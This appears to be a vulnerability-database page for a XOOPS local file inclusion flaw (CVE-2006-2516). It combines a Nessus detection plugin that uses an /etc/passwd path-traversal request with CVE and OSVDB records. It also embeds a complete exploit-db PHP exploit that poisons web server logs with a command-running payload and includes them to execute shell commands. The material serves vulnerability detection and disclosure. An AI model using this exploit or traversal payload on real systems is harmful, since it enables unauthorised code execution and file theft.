XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion
2006-05-23T00:00:00
ID XOOPS_NOCOMMON_FILE_INCLUDE.NASL Type nessus Reporter This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2006-05-23T00:00:00
Description
The version of XOOPS installed on the remote host allows an
unauthenticated attacker to skip processing of the application's
'include/common.php' script and thereby to gain control of the
variables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',
which are used by various scripts to include PHP code from other
files. Successful exploitation of these issues requires that PHP's
'register_globals' setting be enabled (the CVE record for this issue
also requires 'magic_quotes_gpc' to be disabled); it can then be used
to view arbitrary files or to execute arbitrary PHP code on the remote
host, subject to the privileges of the web server user id.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
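# Plugin registration: runs only when the scanner loads the plugin to
# collect its metadata; the trailing exit(0) keeps the check itself from
# running in that mode.
if (description)
{
  script_id(21581);
  script_version("1.15");

  script_cve_id("CVE-2006-2516");
  script_bugtraq_id(18061);

  script_name(english:"XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion");
  script_summary(english:"Tries to read a local file using XOOPS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is vulnerable to
local file include attacks." );
  script_set_attribute(attribute:"description", value:
"The version of XOOPS installed on the remote host allows an
unauthenticated attacker to skip processing of the application's
'include/common.php' script and thereby to gain control of the
variables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',
which are used by various scripts to include PHP code from other
files. Successful exploitation of these issues requires that PHP's
'register_globals' setting be enabled and can be used to view
arbitrary files or to execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user id." );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/434698/30/0/threaded" );
  # The solution used to read "Unknown at this time.", which contradicted
  # the RL:OF (official fix) value in the temporal vector below and left
  # the finding without remediation guidance.
  script_set_attribute(attribute:"solution", value:
"Apply the patch released by the vendor. Disabling PHP's
'register_globals' setting also prevents the variable overwrite that
this issue depends on." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  # NOTE(review): the temporal vector above records E:POC, which sits oddly
  # with exploit_available "false" -- confirm which value is intended.
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_publication_date", value: "2006/05/23");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/05/21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_ATTACK: the check below sends a request that exercises the flaw
  # rather than inferring it from a version string.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Only run after XOOPS detection, on a web port, and only when CGI
  # scanning has not been disabled in the scan settings.
  script_dependencies("xoops_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/xoops");
  exit(0);
}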
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
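# Pick the web port to test and stop early if the server cannot run PHP.
port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);

# Look up the XOOPS install recorded in the KB for this port (presumably
# written by xoops_detect.nasl, which this plugin depends on). The value
# is expected to look like "<something> under <directory>".
install = get_kb_item(string("www/", port, "/xoops"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (matches)
{
  dir = matches[2];

  # Request misc.php with 'xoopsOption[nocommon]' set and a traversal
  # path in 'xoopsConfig[language]'; a vulnerable install will try to
  # include the named file.
  file = "../../../../../../../../../../../etc/passwd%00";
  u = string(
    dir, "/misc.php?",
    "xoopsOption[nocommon]=1&",
    "xoopsConfig[language]=", file
  );
  r = http_send_recv3(port: port, method: "GET", item: u);
  if (isnull(r)) exit(0);

  # The host is flagged if the response body contains...
  if (
    # an entry for root, or...
    egrep(pattern:"root:.*:0:[01]:", string: r[2]) ||
    # a "failed to open stream" error naming the requested path, or...
    egrep(pattern:"main\(.+/etc/passwd\\0/misc\.php.+ failed to open stream", string: r[2]) ||
    # an error claiming the file doesn't exist, or...
    egrep(pattern:"main\(.+/etc/passwd\).*: failed to open stream: No such file or directory", string: r[2]) ||
    # an open_basedir restriction error for the requested path.
    egrep(pattern:"main.+ open_basedir restriction in effect. File\(.*/etc/passwd", string: r[2])
  )
  {
    # Redact the file contents before they are copied into the report.
    r[2] = data_protection::redact_etc_passwd(output:r[2]);
    if (egrep(string: r[2], pattern:"root:.*:0:[01]:"))
      report = string(
        "Here are the contents of the file '/etc/passwd' that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        r[2]
      );
    else
      # This branch used to assign 'desc', a variable this script never
      # defines, so findings based on an error message alone were
      # reported without any supporting detail.
      report = string(
        "The response to the following request indicates that the\n",
        "application tried to include a file named by the request (the\n",
        "file contents are not shown, either because they were not\n",
        "returned or because they were redacted) :\n",
        "\n",
        "  ", u, "\n"
      );

    security_warning(port:port, extra: report);
    exit(0);
  }
}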
{"id": "XOOPS_NOCOMMON_FILE_INCLUDE.NASL", "bulletinFamily": "scanner", "title": "XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion", "description": "The version of XOOPS installed on the remote host allows an\nunauthenticated attacker to skip processing of the application's\n'include/common.php' script and thereby to gain control of the\nvariables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',\nwhich are used by various scripts to include PHP code from other\nfiles. Successful exploitation of these issues requires that PHP's\n'register_globals' setting be enabled and can be used to view\narbitrary files or to execute arbitrary PHP code on the remote host,\nsubject to the privileges of the web server user id.", "published": "2006-05-23T00:00:00", "modified": "2006-05-23T00:00:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/21581", "reporter": "This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/434698/30/0/threaded"], "cvelist": ["CVE-2006-2516"], "type": "nessus", "lastseen": "2021-01-20T15:49:20", "edition": 26, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2516"]}, {"type": "osvdb", "idList": ["OSVDB:25683"]}, {"type": "exploitdb", "idList": ["EDB-ID:1811"]}], "modified": "2021-01-20T15:49:20", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-20T15:49:20", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21581);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2006-2516\");\n script_bugtraq_id(18061);\n\n script_name(english:\"XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion\");\n script_summary(english:\"Tries to read a local file using XOOPS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is vulnerable to\nlocal file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of XOOPS installed on the remote host allows an\nunauthenticated attacker to skip processing of the application's\n'include/common.php' script and thereby to gain control of the\nvariables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',\nwhich are used by various scripts to include PHP code from other\nfiles. 
Successful exploitation of these issues requires that PHP's\n'register_globals' setting be enabled and can be used to view\narbitrary files or to execute arbitrary PHP code on the remote host,\nsubject to the privileges of the web server user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/434698/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"xoops_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/xoops\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, embedded: 0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/xoops\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (matches)\n{\n dir = matches[2];\n\n # Try to exploit one of the flaws to read a file.\n file = \"../../../../../../../../../../../etc/passwd%00\";\n u = string(\n dir, \"/misc.php?\",\n \"xoopsOption[nocommon]=1&\",\n \"xoopsConfig[language]=\", file\n );\n r = http_send_recv3(port: port, method: \"GET\", item: u);\n if (isnull(r)) exit(0);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string: r[2]) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(.+/etc/passwd\\\\0/misc\\.php.+ failed to open stream\", string: r[2]) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(.+/etc/passwd\\).*: failed to open stream: No such file or directory\", string: r[2]) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(.*/etc/passwd\", string: r[2])\n )\n {\n r[2] = data_protection::redact_etc_passwd(output:r[2]);\n if (egrep(string: r[2], pattern:\"root:.*:0:[01]:\"))\n report = string(\n \"Here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n r[2]\n );\n else report = desc;\n\n security_warning(port:port, extra: report);\n exit(0);\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "21581", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:27:20", "description": "mainfile.php in XOOPS 2.0.13.2 and earlier, when register_globals is enabled, allows remote attackers to overwrite variables such as $xoopsOption['nocommon'] and conduct directory traversal attacks or include PHP files via (1) xoopsConfig[language] to misc.php or (2) xoopsConfig[theme_set] to index.php, as demonstrated by injecting PHP sequences into a log file.\nSuccessful exploitation requires that \"register_globals\" is enabled, and that \"magic_quotes_gpc\" is disabled.", "edition": 6, "cvss3": {}, "published": "2006-05-22T22:02:00", "title": "CVE-2006-2516", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2516"], "modified": "2018-10-18T16:40:00", "cpe": ["cpe:/a:xoops:xoops:2.0.5", "cpe:/a:xoops:xoops:2.0.11", "cpe:/a:xoops:xoops:2.0.13.2", "cpe:/a:xoops:xoops:2.0.7", "cpe:/a:xoops:xoops:2.0.4", "cpe:/a:xoops:xoops:2.0.6", "cpe:/a:xoops:xoops:2.0.12_jp", "cpe:/a:xoops:xoops:2.0.2", "cpe:/a:xoops:xoops:2.0.5.1", "cpe:/a:xoops:xoops:2.0", "cpe:/a:xoops:xoops:2.0.3", "cpe:/a:xoops:xoops:2.0.9.2", "cpe:/a:xoops:xoops:2.0.10", "cpe:/a:xoops:xoops:2.0.9.3", "cpe:/a:xoops:xoops:2.0.5.2", "cpe:/a:xoops:xoops:2.0.1", "cpe:/a:xoops:xoops:2.0.13.1", "cpe:/a:xoops:xoops:2.0.9"], "id": "CVE-2006-2516", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2516", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xoops:xoops:2.0.7:*:*:*:*:*:*:*", 
"cpe:2.3:a:xoops:xoops:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.12_jp:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T14:55:47", "description": "XOOPS <= 2.0.13.2 xoopsOption[nocommon] Remote Exploit. CVE-2006-2516. Webapps exploit for php platform", "published": "2006-05-21T00:00:00", "type": "exploitdb", "title": "XOOPS <= 2.0.13.2 - xoopsOptionnocommon Remote Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-2516"], "modified": "2006-05-21T00:00:00", "id": "EDB-ID:1811", "href": "https://www.exploit-db.com/exploits/1811/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\necho \"XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\\r\\n\";\necho \"by rgod rgod@autistici.org\\r\\n\";\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\n\n/*\n works with:\n magic_quotes_gpc = Off\n register_globals = On\n*/\n\nif ($argc<4) {\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\necho \"host: target server (ip/hostname)\\r\\n\";\necho \"path: path to xoops\\r\\n\";\necho \"cmd: a shell command\\r\\n\";\necho \"Options:\\r\\n\";\necho \" -p[port]: specify a port other than 80\\r\\n\";\necho \" -P[ip:port]: specify a proxy\\r\\n\";\necho \"Examples:\\r\\n\";\necho \"php \".$argv[0].\" localhost /xoops/ \\r\\n\";\necho \"php \".$argv[0].\" 
localhost /xoops/ ls -la -p81\\r\\n\";\necho \"php \".$argv[0].\" localhost / ls -la -P1.1.1.1:80\\r\\n\";\ndie;\n}\n\n/* hi, back from my annual social engineering tour, this year in Milan ;)\n welcome to this new 0day experience...\n explaination:\n\n vulnerable code in mainfile.php at lines 94-96:\n ...\n if (!isset($xoopsOption['nocommon']) && XOOPS_ROOT_PATH != '') {\n\t\tinclude XOOPS_ROOT_PATH.\"/include/common.php\";\n\t}\n ...\n\n if register_globals = On you can overwrite $xoopsOption['nocommon'] var, to\n skip common.php inclusion where $xoopsConfig['language'] and\n $xoopsConfig['theme_set] are initialized, so, if magic_quotes_gpc=Off\n you can include arbitrary files from local resources, ex., Apache log files:\n\n http://[target]/[path]/misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[language]=../../../../../../../../../../var/log/httpd/access_log%00\n http://[target]/[path]/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../../../../../../../../../../var/log/httpd/error_log%00\n\n or, if avatar uploads are enabled:\n\n http://[target]/xoops/html/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../uploads/cavt44703c30d3dbf.jpg%00\n\n this tool inject some php code in apache log files and try to launch commands\n\t\t\t\t\t\t\t\t\t */\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction 
sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n #debug\n #echo \"\\r\\n\".$html;\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$cmd=\"\";$port=80;$proxy=\"\";\n\nfor ($i=3; $i<=$argc-1; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\n{$cmd.=\" \".$argv[$i];}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\n$cmd=urlencode($cmd);\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\necho \"[1] Injecting some code in log files ...\\r\\n\\r\\n\";\n$CODE=\"*delim*<?php error_reporting(0);set_time_limit(0);passthru(\\$_COOKIE[cmd]);die;?>\";\n$packet=\"GET \".$p.$CODE.\" HTTP/1.0\\r\\n\";\n$packet.=\"User-Agent: \".$CODE.\" Googlebot/2.1\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: close\\r\\n\\r\\n\";\nsendpacketii($packet);\nsleep(1);\n\n//fill with possible locations...\n$paths=array(\n\"../../../../../../../../../../var/log/httpd/access_log\",\n\"../../../../../../../../../../var/log/httpd/error_log\",\n\"../apache/logs/error.log\",\n\"../apache/logs/access.log\",\n\"../../apache/logs/error.log\",\n\"../../apache/logs/access.log\",\n\"../../../apache/logs/error.log\",\n\"../../../apache/logs/access.log\",\n\"../../../../apache/logs/error.log\",\n\"../../../../apache/logs/access.log\",\n\"../../../../../apache/logs/error.log\",\n\"../../../../../apache/logs/access.log\",\n\"../../../../../../apache/logs/error.log\",\n\"../../../../../../apache/logs/access.log\",\n\"../logs/error.log\",\n\"../logs/access.log\",\n\"../../logs/error.log\",\n\"../../logs/access.log\",\n\"../../../logs/error.log\",\n\"../../../logs/access.log\",\n\"../../../../logs/error.log\",\n\"../../../../logs/access.log\",\n\"../../../../../logs/error.log\",\n\"../../../../../logs/access.log\",\n\"../../../../../../logs/error.log\",\n\"../../../../../../logs/access.log\",\n\"../../../../../../../../../../etc/httpd/logs/acces_log\",\n\"../../../../../../../../../../etc/httpd/logs/acces.log\",\n\"../../../../../../../../../../etc/httpd/logs/error_log\",\n\"../../../../../../../../../../etc/httpd/logs/error.log\",\n\"../../../../../../../../../../var/www/logs/access_log\",\n\"../../../../../../../../../../var/www/logs/access.log\",\n\"../../../../../../../../../../usr/local/apache/logs/access_log\",\n\"../../../../../../../../../../usr/local/apache/logs/acce
ss.log\",\n\"../../../../../../../../../../var/log/apache/access_log\",\n\"../../../../../../../../../../var/log/apache/access.log\",\n\"../../../../../../../../../../var/log/access_log\",\n\"../../../../../../../../../../var/www/logs/error_log\",\n\"../../../../../../../../../../var/www/logs/error.log\",\n\"../../../../../../../../../../usr/local/apache/logs/error_log\",\n\"../../../../../../../../../../usr/local/apache/logs/error.log\",\n\"../../../../../../../../../../var/log/apache/error_log\",\n\"../../../../../../../../../../var/log/apache/error.log\",\n\"../../../../../../../../../../var/log/access_log\",\n\"../../../../../../../../../../var/log/error_log\"\n);\n\n$xpl= array (\n\t \"misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=\",\n\t \"index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]=\"\n\t );\n\nfor ($j=0; $j<=count($xpl)-1; $j++)\n{\n for ($i=0; $i<=count($paths)-1; $i++)\n {\n $a=$i+2;\n echo \"[\".$a.\"] Trying with: \".$xpl[$j].$paths[$i].\"%00\\r\\n\";\n $packet =\"GET \".$p.$xpl[$j].$paths[$i].\"%00 HTTP/1.0\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Cookie: cmd=\".$cmd.\";\\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n #debug\n #echo quick_dump($packet);\n sendpacketii($packet);\n if (strstr($html,\"*delim*\"))\n {\n echo \"Exploit succeeded...\\r\\n\";\n $temp=explode(\"*delim*\",$html);\n die($temp[1]);\n }\n }\n}\n//if you are here...\necho \"Exploit failed...\";\n?>\n\n# milw0rm.com [2006-05-21]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1811/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "cvelist": ["CVE-2006-2516"], "edition": 1, "description": "## Vulnerability Description\nXoops contains a flaw that may lead to an unauthorized information disclosure. 
The issue is triggered when passing input to \"xoopsConfig\" array parameter when the \"xoopsOption[nocommon]\" parameter is defined, which will disclose arbitrary files from local resources resulting in a loss of confidentiality.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off' and the register_globals PHP option is 'on'.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Xoops has released a patch to address this vulnerability.\n## Short Description\nXoops contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when passing input to \"xoopsConfig\" array parameter when the \"xoopsOption[nocommon]\" parameter is defined, which will disclose arbitrary files from local resources resulting in a loss of confidentiality.\n## References:\nVendor Specific Solution URL: http://www.xoops.org/modules/news/article.php?storyid=3112\n[Secunia Advisory ID:20176](https://secuniaresearch.flexerasoftware.com/advisories/20176/)\nOther Advisory URL: http://milw0rm.com/exploits/1811\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0416.html\nFrSIRT Advisory: ADV-2006-1895\n[CVE-2006-2516](https://vulners.com/cve/CVE-2006-2516)\nBugtraq ID: 18061\n", "modified": "2006-05-21T08:32:37", "published": "2006-05-21T08:32:37", "href": "https://vulners.com/osvdb/OSVDB:25683", "id": "OSVDB:25683", "title": "XOOPS xoopsConfig Variable Overwrite Arbtirary Local File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}